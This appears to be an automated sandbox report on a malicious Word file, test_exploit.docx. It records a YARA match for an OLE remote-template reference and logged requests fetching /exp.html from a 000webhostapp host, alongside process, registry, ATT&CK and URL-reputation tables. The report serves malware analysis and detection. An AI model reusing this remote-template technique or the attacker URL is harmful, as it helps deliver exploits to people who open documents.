Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://roaming.edog.
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://tasks.office.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: exp[1].htm.0.dr	String found in binary or memory: https://www.bbc.com/news/live/world-europe-60517447
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown

DNS traffic detected: queries for: samisoooo.000webhostapp.com

Source: global traffic	HTTP traffic detected: GET /exp.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: samisoooo.000webhostapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /exp.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: samisoooo.000webhostapp.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 145.14.144.97:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 145.14.144.176:443 -> 192.168.2.3:49740 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: document.xml.rels, type: SAMPLE

Matched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen

Source: document.xml.rels, type: SAMPLE

Matched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents

Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE

Section loaded: sfc.dll

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288

Source: test_exploit.docx.docx.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\test_exploit.docx.docx

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{479EBBC5-90F9-464C-96EA-F1216157167B} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

Jump to behavior

Source: classification engine

Classification label: mal60.expl.evad.winDOCX@5/15@2/3

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: test_exploit.docx.docx

Initial sample: OLE zip file path = word/media/image1.wmf

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: https://samisoooo.000webhostapp.com/exp.html

Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE

Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Source: C:\Windows\splwow64.exe

Thread delayed: delay time: 120000

Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Exploitation for Client Execution	1 DLL Side-Loading	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Query Registry	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 DLL Side-Loading	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
test_exploit.docx.docx	5%	Virustotal		Browse
test_exploit.docx.docx	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
us-east-1.route-1.000webhost.awex.io	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://roaming.edog.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	URL Reputation	safe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://api.aadrm.com	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
us-east-1.route-1.000webhost.awex.io	145.14.144.97	true	false	1%, Virustotal, Browse	unknown
samisoooo.000webhostapp.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://login.microsoftonline.com/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://shell.suite.office.com:1443	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://autodiscover-s.outlook.com/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://roaming.edog.	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://cdn.entity.	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://powerlift.acompli.net	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://cortana.ai	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://api.aadrm.com/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
